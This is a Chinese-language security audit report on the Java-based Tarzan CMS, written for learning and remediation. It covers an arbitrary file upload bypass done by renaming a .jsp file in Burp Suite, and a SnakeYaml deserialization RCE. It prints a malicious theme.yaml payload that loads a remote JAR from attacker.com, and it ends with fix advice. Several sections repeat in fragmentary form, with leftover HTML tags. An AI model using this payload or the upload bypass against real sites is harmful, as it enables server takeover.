泰山CMS(tarzancms)代码审计报告<\/h1>

前言<\/h2>
泰山CMS（tarzancms）是一款基于Java开发的内容管理系统。本报告详细分析了该系统中存在的安全漏洞，包括任意文件上传漏洞和远程代码执行(RCE)漏洞，并提供了复现方法和修复建议。<\/p>

环境搭建<\/h2>

所需环境<\/h3>

IDEA 2024.4<\/li>
JDK 1.8<\/li>
MySQL 8<\/li> <\/ul>
搭建步骤<\/h3>
1. 从Gitee获取源码：https:\/\/gitee.com\/taisan\/tarzan-cms<\/code><\/li>
2. 新建MySQL数据库并导入SQL文件：先导入schema-mysql.sql<\/code><\/li> 再导入data.sql<\/code><\/li> <\/ul> <\/li> IDEA设置：设置项目SDK为JDK8<\/li> 配置JDBC连接<\/li> <\/ul> <\/li> 启动CmsApplication<\/code><\/li> <\/ol> 漏洞分析<\/h2> 1. 任意文件上传漏洞<\/h3> 漏洞位置<\/h4> 后台文件上传功能<\/p> 漏洞分析<\/h4> 上传路由处理代码直接从@RequestParam<\/code>获取数据，交给ossService.upload<\/code>处理<\/li> upload<\/code>方法仅判断文件是否为空，未对文件类型和内容进行验证<\/li> 默认使用本地上传模式(CoreConst.UPLOAD_TYPE_LOCAL<\/code>)<\/li> FileUploadUtil.uploadLocal<\/code>方法未做任何安全过滤，导致任意文件上传<\/li> <\/ol> 复现步骤<\/h4> 前端上传.jsp文件会被拦截<\/li> 将文件名改为.png绕过前端检查<\/li> 使用Burp Suite拦截请求，将文件名改回.jsp<\/li> 上传成功后可访问上传的恶意文件<\/li> <\/ol> 2. 远程代码执行(RCE)漏洞<\/h3> 漏洞位置<\/h4> 主题管理功能<\/p> 漏洞分析<\/h4> 主题上传功能直接将上传的文件传入themeService.upload(file)<\/code><\/li> 上传的ZIP文件被解压后，其中的YAML文件被SnakeYaml解析<\/li> SnakeYaml存在反序列化漏洞，全版本受影响<\/li> 攻击者可构造恶意YAML文件实现远程代码执行<\/li> <\/ol> 漏洞利用原理<\/h4> 创建包含恶意代码的theme.yaml<\/code>文件<\/li> YAML解析器处理时会：创建URL对象指向攻击者的JAR文件<\/li> 创建URLClassLoader加载远程JAR<\/li> 创建ScriptEngineManager执行恶意代码<\/li> <\/ul> <\/li> <\/ol> 复现步骤<\/h4> 创建恶意YAML文件theme.yaml<\/code>： !!javax.script.ScriptEngineManager<\/span> [ <\/span><\/span> !!java.net.URLClassLoader<\/span> [[ <\/span><\/span> !!java.net.URL<\/span> ["http:\/\/attacker.com\/xzsq.jar"<\/span>] <\/span><\/span> ]] <\/span><\/span>] <\/span><\/span><\/code><\/pre><\/li> 将YAML文件打包为theme.zip<\/code><\/li> 上传ZIP文件触发漏洞<\/li> 攻击者服务器收到请求，恶意代码被执行<\/li> <\/ol> 有效Payload示例<\/h4> 可使用https:\/\/github.com\/artsploit\/yaml-payload\/blob\/master\/src\/artsploit\/AwesomeScriptEngineFactory.java<\/code>中的Payload<\/p> 其他潜在问题<\/h2> 任意文件删除<\/strong>：系统多处未对filename进行过滤，可能导致任意文件删除<\/li> SQL注入<\/strong>：部分代码可能存在SQL注入风险<\/li> <\/ol> 修复建议<\/h2> 文件上传功能：<\/p> 实施严格的文件类型检查<\/li> 限制上传文件扩展名<\/li> 对上传内容进行安全扫描<\/li> 将上传文件存储在非web可访问目录<\/li> <\/ul> <\/li> RCE漏洞：<\/p> 升级SnakeYaml到安全版本<\/li> 禁用YAML的类加载功能<\/li> 对上传的主题文件进行严格验证<\/li> 使用白名单机制限制可解析的内容<\/li> <\/ul> <\/li> 通用安全措施：<\/p> 实施输入验证和过滤<\/li> 使用参数化查询防止SQL注入<\/li> 实施最小权限原则<\/li> <\/ul> <\/li> <\/ol> 总结<\/h2> 泰山CMS存在严重的安全漏洞，攻击者可利用这些漏洞实现任意文件上传和远程代码执行。开发人员应重视代码审计和安全开发实践，及时修复这些漏洞。安全研究人员可通过此案例学习Java代码审计的方法和技巧。<\/p>

泰山CMS(tarzancms)代码审计报告<\/h1>

前言<\/h2> 泰山CMS（tarzancms）是一款基于Java开发的内容管理系统。本报告详细分析了该系统中存在的安全漏洞，包括任意文件上传漏洞和远程代码执行(RCE)漏洞，并提供了复现方法和修复建议。<\/p>

环境搭建<\/h2>

漏洞分析<\/h2>

1. 任意文件上传漏洞<\/h3>

漏洞位置<\/h4> 后台文件上传功能<\/p>

2. 远程代码执行(RCE)漏洞<\/h3>

漏洞位置<\/h4> 主题管理功能<\/p>

有效Payload示例<\/h4> 可使用https:\/\/github.com\/artsploit\/yaml-payload\/blob\/master\/src\/artsploit\/AwesomeScriptEngineFactory.java<\/code>中的Payload<\/p>

总结<\/h2> 泰山CMS存在严重的安全漏洞，攻击者可利用这些漏洞实现任意文件上传和远程代码执行。开发人员应重视代码审计和安全开发实践，及时修复这些漏洞。安全研究人员可通过此案例学习Java代码审计的方法和技巧。<\/p>

前言<\/h2>
泰山CMS（tarzancms）是一款基于Java开发的内容管理系统。本报告详细分析了该系统中存在的安全漏洞，包括任意文件上传漏洞和远程代码执行(RCE)漏洞，并提供了复现方法和修复建议。<\/p>

漏洞位置<\/h4>
后台文件上传功能<\/p>

漏洞位置<\/h4>
主题管理功能<\/p>

有效Payload示例<\/h4>
可使用`https:\/\/github.com\/artsploit\/yaml-payload\/blob\/master\/src\/artsploit\/AwesomeScriptEngineFactory.java<\/code>中的Payload<\/p>`

总结<\/h2>
泰山CMS存在严重的安全漏洞，攻击者可利用这些漏洞实现任意文件上传和远程代码执行。开发人员应重视代码审计和安全开发实践，及时修复这些漏洞。安全研究人员可通过此案例学习Java代码审计的方法和技巧。<\/p>